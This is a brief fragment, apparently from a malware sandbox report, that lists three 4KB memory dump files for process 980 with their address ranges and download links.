memory/980-160-0x0000000001362000-0x0000000001363000-memory.dmp

Filesize
4KB

Download
memory/980-159-0x0000000001360000-0x0000000001361000-memory.dmp

Filesize
4KB

Download
memory/980-163-0x0000000005720000-0x0000000005721000-memory.dmp

Filesize
4KB

Download